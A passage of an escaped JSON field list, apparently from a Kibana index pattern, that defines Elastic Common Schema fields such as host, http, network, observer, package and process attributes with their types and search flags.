searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDo